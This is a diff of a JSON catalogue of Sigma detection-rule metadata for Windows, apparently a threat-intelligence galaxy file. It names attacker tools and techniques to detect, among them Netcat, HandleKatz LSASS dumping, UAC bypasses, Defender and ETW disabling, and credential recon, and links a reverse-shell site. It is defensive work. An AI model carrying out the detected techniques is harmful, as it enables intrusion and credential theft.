+ "filename": "proc_creation_win_apt_mercury.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.g0069" + ] + }, + "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "value": "MERCURY Command Line Patterns" + }, + { + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Very Possible" + ], + "filename": "proc_creation_win_lolbin_diantz_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "value": "Suspicious Diantz Alternate Data Stream Execution" + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "meta": { + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "creation_date": "2022/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_outlook_shell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", + "value": "Microsoft Outlook Product Spawning Windows Shell" + }, + { + "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "meta": { + "author": "Christian Burkard, Florian Roth", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "value": "UAC Bypass Tool UACMe Akagi" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher" + }, + { + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" + ], + "filename": "proc_creation_win_susp_taskkill.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://car.mitre.org/wiki/CAR-2013-04-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "value": "Suspicious Execution of Taskkill" + }, + { + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/21", + "falsepositive": [ + "Legitimate deinstallation by administrative staff" + ], + "filename": "proc_creation_win_susp_disable_raccine.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "value": "Raccine Uninstall" + }, + { + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_handlekatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "value": "HandleKatz LSASS Dumper Usage" + }, + { + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", + "meta": { + "author": "Florian Roth, juju4, keepwatch", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_certutil_command.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.command_and_control", + "attack.t1105", + "attack.s0160", + "attack.g0007", + "attack.g0010", + "attack.g0045", + "attack.g0049", + "attack.g0075", + "attack.g0096" + ] + }, + "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "value": "Suspicious Certutil Command Usage" + }, + { + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "meta": { + "author": "Endgame, JHasenbusch (ported for oscd.community)", + "creation_date": "2018/10/30", + "falsepositive": [ + "Legitimate use of net.exe utility by legitimate user" + ], + "filename": "proc_creation_win_net_enum.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "62510e69-616b-4078-b371-847da438cc03", + "value": "Windows Network Enumeration" + }, + { + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "meta": { + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_system_user_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules", + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" + ], + "tags": "No established tags" + }, + "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "value": "Suspicious SYSTEM User Process Creation" + }, + { + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "meta": { + "author": "X__Junior, Florian Roth", + "creation_date": "2022/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rar_susp_greedy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy.yml" ], "tags": [ - "car.2013-04-002", "attack.execution", "attack.t1059" ] }, - "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", - "value": "Quick Execution of a Series of Suspicious Commands" + "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "value": "RAR Greedy Compression" }, { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "value": "Suspicious Schtasks Schedule Type With High Privileges" + }, + { + "description": "Detects new commands that add new printer port which point to suspicious file", + "meta": { + "author": "EagleEye Team, Florian Roth", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "proc_creation_win_exploit_cve_2020_1048.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" + }, + { + "description": "Detect the use of Windows Defender to download payloads", + "meta": { + "author": "Matthew Matchen", + "creation_date": "2020/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", + "value": "Windows Defender Download Activity" + }, + { + "description": "Detects some Empire PowerShell UAC bypass methods", + "meta": { + "author": "Ecco", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", + "value": "Empire PowerShell UAC Bypass" + }, + { + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Legitimate admin scripts" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "value": "Suspicious CMD Shell Redirect" + }, + { + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "value": "Bitsadmin Download to Uncommon Target Folder" + }, + { + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Administrative activity (rare lookups on current privileges)" + ], + "filename": "proc_creation_win_whoami_priv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "value": "Run Whoami Showing Privileges" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_network_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "value": "Suspicious Network Command" + }, + { + "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1168863899531132929", + "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "value": "Emissary Panda Malware SLLauncher" + }, + { + "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/03", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_disable_feature.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", + "value": "Powershell Defender Disable Scan Feature" + }, + { + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate use when App-v is deployed" + ], + "filename": "proc_creation_win_lolbin_scriptrunner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", + "value": "Use of Scriptrunner.exe" + }, + { + "description": "Detects usage of cmdkey to look for cached credentials", + "meta": { + "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_cmdkey_recon.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.005" + ] + }, + "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "value": "Cmdkey Cached Credentials Recon" + }, + { + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "value": "Bitsadmin Download to Suspicious Target Folder" + }, + { + "description": "Detects when a user downloads file by using CertOC.exe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_certoc_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "value": "Suspicious File Download via CertOC.exe" + }, + { + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate files with these rare hacktool names" + ], + "filename": "proc_creation_win_tools_relay_attacks.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://attack.mitre.org/techniques/T1557/001/", + "https://github.com/ohpe/juicy-potato", + "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", + "value": "SMB Relay Attack Tools" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_slingshot.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005", + "attack.s0111" + ] + }, + "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "value": "Defrag Deactivation" + }, + { + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "meta": { "author": "frack113, Florian Roth", "creation_date": "2021/07/21", @@ -42934,6 +35701,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.revshells.com/", "https://nmap.org/ncat/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" @@ -42944,81 +35712,317 @@ ] }, "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "value": "Ncat Execution" + "value": "Netcat Suspicious Execution" }, { - "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "description": "Detects the use of SDelete to erase a file not the free space", "meta": { - "author": "Sander Wiebing", - "creation_date": "2020/05/23", + "author": "frack113", + "creation_date": "2021/06/03", "falsepositive": [ - "Legitimate administration" + "System administrator usage" ], - "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "filename": "proc_creation_win_sdelete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "a4824fca-976f-4964-b334-0621379e84c4", + "value": "Sysinternals SDelete Delete File" + }, + { + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "meta": { + "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ] }, - "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "value": "Netsh RDP Port Opening" + "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "value": "Disable of ETW Trace" }, { - "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "description": "Detects suspicious powershell command line parameters used in Empire", "meta": { - "author": "Markus Neis, Sander Wiebing", - "creation_date": "2019/01/29", + "author": "Florian Roth", + "creation_date": "2019/04/20", "falsepositive": [ - "Legitimate administration" + "Other tools that incidentally use the same command line parameters" ], - "filename": "proc_creation_win_netsh_fw_add.yml", + "filename": "proc_creation_win_susp_powershell_empire_launch.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "value": "Empire PowerShell Launch Parameters" + }, + { + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Tools that accidentally use the same command line flags and values" + ], + "filename": "proc_creation_win_hashcat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.002" + ] + }, + "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "value": "Password Cracking with Hashcat" + }, + { + "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" + ], + "filename": "proc_creation_win_susp_psloglist.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" + ] + }, + "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "value": "Suspicious Use of PsLogList" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/07", + 